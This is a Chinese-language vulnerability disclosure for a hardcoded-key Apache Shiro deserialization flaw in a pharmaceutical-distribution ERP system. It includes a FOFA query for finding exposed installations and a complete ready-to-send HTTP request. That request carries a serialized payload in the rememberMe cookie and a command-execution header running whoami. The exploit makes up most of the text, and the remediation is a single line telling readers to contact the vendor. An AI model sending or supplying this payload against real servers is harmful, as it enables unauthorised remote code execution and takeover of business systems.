0x01 产品简介

   时空云社会化商业ERP（简称时空云ERP） ，该产品采用JAVA语言和Oracle数据库， 融合用友软件的先进管理理念，汇集各医药企业特色管理需求，通过规范各个流通环节从而提高企业竞争力、降低人员成本，最终实现全面服务于医药批发、零售连锁企业的信息化建设的目标，是一款全面贴合最新GSP要求的医药流通行业一站式管理系统。

0x02 漏洞概述

   云时空社会化商业 ERP 系统存在 shiro 反序列化漏洞，该漏洞源于软件存在硬编码的 shiro-key，攻击者可利用该 key 生成恶意的序列化数据，在服务器上执行任意代码，执行系统命令、或打入内存马等，获取服务器权限。

0x03 复现环境

FOFA：app="云时空社会化商业ERP系统"

0x04 漏洞复现 

Exp

GET /static/js/public.js HTTP/1.1
Host: your-ip
Cookie: rememberMe=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
X-Token-Data: whoami
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

0x05 修复建议

官方已出修复方案，联系官方获取修复补丁。http://www.ysk360.com/